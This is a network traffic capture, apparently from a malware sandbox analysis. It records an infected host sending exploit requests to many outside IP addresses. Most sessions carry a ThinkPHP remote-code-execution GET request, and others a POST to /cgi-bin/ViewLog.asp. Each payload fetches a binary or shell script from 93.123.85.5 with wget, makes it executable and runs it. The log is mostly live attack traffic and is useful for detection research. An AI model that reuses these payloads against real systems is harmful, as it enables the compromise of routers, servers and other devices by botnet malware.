                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              369192.168.2.235515695.211.148.23080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:04.379331112 CET7950OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:04.673449993 CET7961INHTTP/1.1 400 Bad Request
                                                              Server: nginx/1.14.0 (Ubuntu)
                                                              Date: Mon, 13 Nov 2023 21:19:04 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 182
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              37192.168.2.236078095.0.164.15580
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:13.748145103 CET1785OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:15.507464886 CET1987OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:17.683242083 CET2241OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:22.034707069 CET2817OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:30.481666088 CET3841OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:47.375348091 CET5874OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:22.186728001 CET10165OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              370192.168.2.235269295.100.119.3780
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:04.425590038 CET7951OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:04.735349894 CET8031INHTTP/1.0 400 Bad Request
                                                              Server: AkamaiGHost
                                                              Mime-Version: 1.0
                                                              Content-Type: text/html
                                                              Content-Length: 257
                                                              Expires: Mon, 13 Nov 2023 21:19:04 GMT
                                                              Date: Mon, 13 Nov 2023 21:19:04 GMT
                                                              Connection: close
                                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 31 66 38 65 32 31 31 37 26 23 34 36 3b 31 36 39 39 39 31 30 33 34 34 26 23 34 36 3b 63 30 36 65 65 66 65 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                              Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;1f8e2117&#46;1699910344&#46;c06eefe</BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              371192.168.2.234576095.100.227.14080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:04.429244995 CET7952OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:04.742712975 CET8032INHTTP/1.0 400 Bad Request
                                                              Server: AkamaiGHost
                                                              Mime-Version: 1.0
                                                              Content-Type: text/html
                                                              Content-Length: 258
                                                              Expires: Mon, 13 Nov 2023 21:19:04 GMT
                                                              Date: Mon, 13 Nov 2023 21:19:04 GMT
                                                              Connection: close
                                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 35 38 37 65 31 39 62 38 26 23 34 36 3b 31 36 39 39 39 31 30 33 34 34 26 23 34 36 3b 31 64 63 35 38 30 35 64 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                              Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;587e19b8&#46;1699910344&#46;1dc5805d</BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              372192.168.2.233863495.81.124.22880
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:04.628424883 CET7958OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:05.045222044 CET8062INHTTP/1.1 404 Not Found
                                                              Content-Type: text/html
                                                              Server: RomPager/4.07 UPnP/1.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              373192.168.2.235625495.101.82.23480
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:04.632426023 CET7959OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:05.046701908 CET8063INHTTP/1.0 400 Bad Request
                                                              Server: AkamaiGHost
                                                              Mime-Version: 1.0
                                                              Content-Type: text/html
                                                              Content-Length: 257
                                                              Expires: Mon, 13 Nov 2023 21:19:04 GMT
                                                              Date: Mon, 13 Nov 2023 21:19:04 GMT
                                                              Connection: close
                                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 66 63 39 31 30 30 32 26 23 34 36 3b 31 36 39 39 39 31 30 33 34 34 26 23 34 36 3b 61 34 63 63 32 36 33 64 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                              Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;fc91002&#46;1699910344&#46;a4cc263d</BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              374192.168.2.233500262.74.180.1278080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:04.728199005 CET8030OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:05.130770922 CET8076INHTTP/1.1 401 Authorization Required
                                                              WWW-Authenticate: Basic realm="Trimble"
                                                              Server: TRMB/3.0
                                                              Date: Mon, 13 Nov 2023 21:19:22 GMT
                                                              Cache-Control: no-cache, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Fri, 30 Oct 1998 14:19:41 GMT
                                                              Connection: Keep-Alive
                                                              Content-Length: 42
                                                              Content-Type: text/html
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-XSS-Protection: 1; mode=block
                                                              X-Content-Type-Options: nosniff
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 31 3e 4e 65 65 64 20 61 75 74 68 6f 72 69 7a 61 74 69 6f 6e 3c 2f 68 31 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><h1>Need authorization</h1></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              375192.168.2.2335306112.171.120.14180
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:05.355483055 CET8079OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:05.663773060 CET8088INHTTP/1.0 400 Bad Request
                                                              Content-Type: text/html
                                                              Content-Length: 113
                                                              Connection: close
                                                              Date: Mon, 13 Nov 2023 21:17:00 GMT
                                                              Server: httpd
                                                              Data Raw: 3c 68 74 6d 6c 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <html> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              376192.168.2.2342588112.126.199.11280
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:05.361898899 CET8080OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:05.676572084 CET8093INHTTP/1.1 400 Bad Request
                                                              Content-Type: text/html; charset=us-ascii
                                                              Server: Microsoft-HTTPAPI/2.0
                                                              Date: Mon, 13 Nov 2023 21:16:44 GMT
                                                              Connection: close
                                                              Content-Length: 311
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              377192.168.2.235933494.253.17.248080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:05.400681973 CET8081OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:05.737684011 CET8126INHTTP/1.1 405 Not Allowed
                                                              Server: Web server
                                                              Date: Mon, 13 Nov 2023 21:19:04 GMT
                                                              Content-Type: text/html; charset=utf-8
                                                              Content-Length: 155
                                                              Connection: keep-alive
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 57 65 62 20 73 65 72 76 65 72 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>Web server</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              378192.168.2.235431894.120.49.268080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:05.408243895 CET8082OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              379192.168.2.235891462.29.1.1268080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:05.409454107 CET8082OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              38192.168.2.234108695.86.97.7280
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:13.764610052 CET1786OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              380192.168.2.233854894.110.59.258080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:05.469063044 CET8084OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              381192.168.2.233535295.100.247.7680
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:06.976398945 CET8303OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:07.272676945 CET8324INHTTP/1.0 400 Bad Request
                                                              Server: AkamaiGHost
                                                              Mime-Version: 1.0
                                                              Content-Type: text/html
                                                              Content-Length: 258
                                                              Expires: Mon, 13 Nov 2023 21:19:07 GMT
                                                              Date: Mon, 13 Nov 2023 21:19:07 GMT
                                                              Connection: close
                                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 36 36 31 61 37 62 35 63 26 23 34 36 3b 31 36 39 39 39 31 30 33 34 37 26 23 34 36 3b 31 64 31 39 36 33 31 63 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                              Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;661a7b5c&#46;1699910347&#46;1d19631c</BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              382192.168.2.234679695.142.100.6380
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:06.984272003 CET8304OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:07.285384893 CET8326INHTTP/1.1 400 Bad Request
                                                              Date: Mon, 13 Nov 2023 21:19:07 GMT
                                                              Server: Apache
                                                              Content-Length: 226
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
